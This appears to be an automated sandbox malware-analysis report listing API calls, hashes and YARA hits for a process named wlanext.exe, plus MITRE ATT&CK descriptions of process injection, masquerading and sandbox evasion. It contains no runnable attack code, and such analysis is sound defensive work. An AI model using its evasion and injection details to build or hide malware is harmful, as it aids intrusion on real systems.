Function 00FE9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
Instruction ID: 5e72a04e4769699c2707708c02f1d5b0b2c072100efbe9989910579fd59c7c75
Opcode Fuzzy Hash: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
Instruction Fuzzy Hash: 0A90026160500802D2407159541871610169BD0341F52D021A1015555EC6998A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
Instruction ID: d5bd825d9b47240702db2574ceb2672e975a64ff5070821716da03e5d360eaa3
Opcode Fuzzy Hash: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
Instruction Fuzzy Hash: D8900271301004529600A6995804A5A51069BF0341B52D025A5005555D85948861B161

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: baa0556110511710561c96ac1e9ce9ed5320d444bae1012285f46e5151337cb3
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0103FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0103FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00FECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01035720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01035720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0103fdda
0x0103fde2
0x0103fde5
0x0103fdec
0x0103fdfa
0x0103fdff
0x0103fe0a
0x0103fe0f
0x0103fe17
0x0103fe1e
0x0103fe19
0x0103fe19
0x0103fe19
0x0103fe20
0x0103fe21
0x0103fe22
0x0103fe25
0x0103fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0103FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0103FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0103FE01

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
Instruction ID: 4ba9bd8734d97cc55d6d953e291a40347b041a8e98cc385aa41500da1d72e27a
Opcode Fuzzy Hash: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
Instruction Fuzzy Hash: 9CF0F632640202BFEA211A49DC02F63BF5EEB84B30F140314F668561E1DA62F82096F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 6920 Parent PID: 3440 wlanext.exeCOMMON

Executed Functions

Function 033081AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03303B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03303B87,007A002E,00000000,00000060,00000000,00000000), ref: 033081FD

Strings

.z`, xrefs: 033081ED, 033081F8

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: caa3a4a74ba267a8687d9e53f07eede6e3da0dd5f3210387bf38cf307754c67c
Instruction ID: 007b902a007ecfa0138aa5a450f279adfd931264b5e88adc20566611d4455537
Opcode Fuzzy Hash: caa3a4a74ba267a8687d9e53f07eede6e3da0dd5f3210387bf38cf307754c67c
Instruction Fuzzy Hash: BF01A8B6200508ABCB08CF88DC95DDB77A9AF8C754F158248FA1DDB241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 033081B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03303B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03303B87,007A002E,00000000,00000060,00000000,00000000), ref: 033081FD

Strings

.z`, xrefs: 033081ED, 033081F8

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0ad55c716013d2d7436fd86f31bdd43da10ad098e1be418fb99ab3d65e2d8c1a
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 95F0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0330825A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03303D42,5E972F59,FFFFFFFF,03303A01,?,?,03303D42,?,03303A01,FFFFFFFF,5E972F59,03303D42,?,00000000), ref: 033082A5

Strings

U, xrefs: 0330825D

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: U
API String ID: 2738559852-3372436214
Opcode ID: 3d852a0474f9cd2439e75aab647929a54c3fd4ac421b5c7c246cb12cc6807829
Instruction ID: 51a019b85568ff33c52db8989dc2432bfcaed0826bb8ddd2932ad257c696612f
Opcode Fuzzy Hash: 3d852a0474f9cd2439e75aab647929a54c3fd4ac421b5c7c246cb12cc6807829
Instruction Fuzzy Hash: C1F097B6204208AFCB14DF89DC94DEB77A9AF8C754F158258FA1D97241D630E9158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03308260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03303D42,5E972F59,FFFFFFFF,03303A01,?,?,03303D42,?,03303A01,FFFFFFFF,5E972F59,03303D42,?,00000000), ref: 033082A5

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: ee9cab0c01a324e7800e141829c35af1e112188e787981ca84fb01d08a66825a
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: E5F0A4B6200208ABCB14DF89DC90EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03308390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,032F2D11,00002000,00003000,00000004), ref: 033083C9

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 1425f931f13dac948fa47c207a3ba6d99e8c123a76237f80caab9cbda621f811
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: DAF015B6200208ABCB14DF89CC80EEB77ADAF88650F118248BE189B241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 033082DA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03303D20,?,?,03303D20,00000000,FFFFFFFF), ref: 03308305

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 800b20495eeb74605c6c58dcea199c96c402a3f83329b01fb9ad9033e0588504
Instruction ID: 3e0cb24d960109998ba190136df538b64b7fa4356def44d185cc65f95590962c
Opcode Fuzzy Hash: 800b20495eeb74605c6c58dcea199c96c402a3f83329b01fb9ad9033e0588504
Instruction Fuzzy Hash: 27E08676640254AFD710EF98CC44EE77B69EB55254F154155F6589F241C530A600C790

Uniqueness

Uniqueness Score: -1.00%

Function 033082E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03303D20,?,?,03303D20,00000000,FFFFFFFF), ref: 03308305

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: d58a7bffd068a50a334a85bae96240dba8e862172326dbe050a6db82db34ab4d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: A4D01776600314ABDB10EF98CC85EE77BACEF48660F154599BA189B282C930FA0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 032F9B8B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.00000007.00000002.596470850.00000000033A0000.00000040.00000001.(00000000,00000000,00000003,?), ref: 032F9B82

Strings

l, xrefs: 032F9BBF
., xrefs: 032F9BB8

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: A0000.00000040.00000001Dll.00000007.00000002.596470850.00000000033Load
String ID: .$l
API String ID: 461264561-2021555757
Opcode ID: cae8f0cabd176c7e2517d22c7559e07d67cdcb1491c11a3fd5567ce98708c4e3
Instruction ID: 146e02bac9b514d3d3987a8b0ce275b2579039a3a9ea50ac96181f76bcd4ff31
Opcode Fuzzy Hash: cae8f0cabd176c7e2517d22c7559e07d67cdcb1491c11a3fd5567ce98708c4e3
Instruction Fuzzy Hash: 6731E57591020A9FCB20DF68C881BAAF3F8EF49708F0485A9D50ACB151E771E5C5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03306ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03306F78

Strings

wininet.dll, xrefs: 03306F2E, 03306F37
net.dll, xrefs: 03306F41, 03306FC7, 03306F9F, 03306FAB, 03306FD3

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a705359779e266b6c10114a0dcbaf85ca51dc51961e8726165b982647410628b
Instruction ID: fa9dcafef9595945e7d6e90638ce256fce0b84cfa107131dada5ff448d048d99
Opcode Fuzzy Hash: a705359779e266b6c10114a0dcbaf85ca51dc51961e8726165b982647410628b
Instruction Fuzzy Hash: F5318DB5A01704ABD715DFA8CCF1FABB7B8EB88700F04851DF61A9B285D770A455CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03306EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03306F78

Strings

wininet.dll, xrefs: 03306F2E, 03306F37
net.dll, xrefs: 03306F41, 03306F9F, 03306FAB

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f97edc980d03ba73c6566fc07a7b69254984db1f1581735dc93db03913a6b967
Instruction ID: 47c5239778268a33f1a8a0a7422a629454f21fdcb88037194e9445af4717773c
Opcode Fuzzy Hash: f97edc980d03ba73c6566fc07a7b69254984db1f1581735dc93db03913a6b967
Instruction Fuzzy Hash: D921A0B5A45305ABD710DFA4C8F1FABBBB8EF48700F04856DF6199B285D370A551CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 033084B5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.00000007.00000002.596470850.00000000033A0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,032F3B93), ref: 033084ED

Strings

.z`, xrefs: 033084DC, 033084E8

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: A0000.00000040.00000001FreeHeap.00000007.00000002.596470850.00000000033
String ID: .z`
API String ID: 2543561150-1441809116
Opcode ID: a805ec55e72e34b5ec9b0b2bb4d736d18d8f0623d9dfbce845aaa46579b3fac2
Instruction ID: 4839250c9b6ef18c64fbc5f9b53227fcea17c4f7c35e73419891f9f92476164b
Opcode Fuzzy Hash: a805ec55e72e34b5ec9b0b2bb4d736d18d8f0623d9dfbce845aaa46579b3fac2
Instruction Fuzzy Hash: 30F03076201204AFCB24DFA9DC84EEB7B68EF88360F154149F91D9B741D731E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 033084C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.00000007.00000002.596470850.00000000033A0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,032F3B93), ref: 033084ED

Strings

.z`, xrefs: 033084DC, 033084E8

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: A0000.00000040.00000001FreeHeap.00000007.00000002.596470850.00000000033
String ID: .z`
API String ID: 2543561150-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 61e9bfafd4bd2fe70a9db5ba4832bc490d3c6edd6e80859d744453644e18defe
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 21E01AB5200204ABDB14DF59CC44EA777ACAF88650F014554BA185B241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 032F7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 032F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 032F72DB

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction ID: 2f4de83cf11b247a41d447e574072509ce7851229a05e8fbdf8e9c203476d58c
Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction Fuzzy Hash: 7D01A735E903297AE720E6949C42FFEB76C5B00B51F140125FF04BE1C1E6D4A94687F5

Uniqueness

Uniqueness Score: -1.00%

Function 032F9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.00000007.00000002.596470850.00000000033A0000.00000040.00000001.(00000000,00000000,00000003,?), ref: 032F9B82

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: A0000.00000040.00000001Dll.00000007.00000002.596470850.00000000033Load
String ID:
API String ID: 461264561-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 571bdbc50bcbff00c0f9f30a73c2288493c2c3b2a135e7e632f23182338c561f
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 830125B9D4020DABDF10EBE4DC91F9DF3789F54208F0441A5EA089B281F671E754C791

Uniqueness

Uniqueness Score: -1.00%

Function 03308530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03308584

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 28ce2aebc8db5e827227d17404a258035fedf1245337b70eab5cbeeed9a1f8bd
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7401AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03307000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,032FCCC0,?,?), ref: 0330703C

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5e820ab73cdadbf1468b2c642f581bbf31c518ef26bc2b454088f6ce9a9c7621
Instruction ID: 166639723ab7ac2609fb8f7ba62cca6db1f397526389b10621ba2ec9d31aadd0
Opcode Fuzzy Hash: 5e820ab73cdadbf1468b2c642f581bbf31c518ef26bc2b454088f6ce9a9c7621
Instruction Fuzzy Hash: 56E092777803143AE330A5A9AC42FA7B39CCB81B30F140126FA0DEB6C0D599F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 03306FF4, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,032FCCC0,?,?), ref: 0330703C

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 93fed2907aad67e6b239652f7e66859df7bfef9bdc4b727d6a4c31d42e5fc5f3
Instruction ID: b225704c6e29a2b38ebff5983c69d79949f17a2f5c93748afd0eb12f6fa06041
Opcode Fuzzy Hash: 93fed2907aad67e6b239652f7e66859df7bfef9bdc4b727d6a4c31d42e5fc5f3
Instruction Fuzzy Hash: E6F0EC766403103AD330A5749C42FE7B3D89F94B10F18051DF589EB1C1C595B8418654

Uniqueness

Uniqueness Score: -1.00%

Function 03308612, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,032FCF92,032FCF92,?,00000000,?,?), ref: 03308650

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 626fbfbcd53b4309e7e1916e69710a3e61edf4d0ba665f1ec207b72297caa842
Instruction ID: 3f8b6d4dc548da7fd5ab1dcd361264254d00b56173b30c481789df2b07075eae
Opcode Fuzzy Hash: 626fbfbcd53b4309e7e1916e69710a3e61edf4d0ba665f1ec207b72297caa842
Instruction Fuzzy Hash: DFF0A0B56003147FDB24DF58CC84EEB3BA9EF88210F008259FA095B241CA31A91087E1

Uniqueness

Uniqueness Score: -1.00%

Function 032FD3F7, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032F7C63,?), ref: 032FD42B

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d0c1026558056b298f585b60d3549a784c6df44eba17cba6295cf12d8db8eba6
Instruction ID: a6feca707a2cebfd6eb9d839d518bfb2c4de0b551c2d169ff9ca0b04aa34c0d8
Opcode Fuzzy Hash: d0c1026558056b298f585b60d3549a784c6df44eba17cba6295cf12d8db8eba6
Instruction Fuzzy Hash: 92E02BDA6B87493EE720EAB01D03FA37B448B01354F090BA4E58CEF1E3D44DC0564035

Uniqueness

Uniqueness Score: -1.00%

Function 03308620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,032FCF92,032FCF92,?,00000000,?,?), ref: 03308650

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: dcd9a2420df861555c9eb6b0d452f32bd096293eee02e7e4ab89dc94c6ac6225
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 57E01AB5600208ABDB10DF49CC84EE737ADAF88650F018154BA085B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 03308480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.00000007.00000002.596470850.00000000033A0000.00000040.00000001.(03303506,?,03303C7F,03303C7F,?,03303506,?,?,?,?,?,00000000,00000000,?), ref: 033084AD

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: A0000.00000040.00000001AllocateHeap.00000007.00000002.596470850.00000000033
String ID:
API String ID: 1797703913-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: dd901f12c542018b40ec54639bcb002191ce9673e033f8038e457c80a5aee08c
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 68E012B6200208ABDB14EF99CC80EA777ACAF88650F118558BA185B281CA30F9108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 032FD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032F7C63,?), ref: 032FD42B

Memory Dump Source

Source File: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Offset: 032F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: aac91886d86139856c5d8f1f8d5e5bc7f571d70064edb5b77ec3d21d0fda6ce1
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 0AD0A7767903043BE610FAA49C03F26B2CD9B44A10F494074FA48DB3C3D950F4008171

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

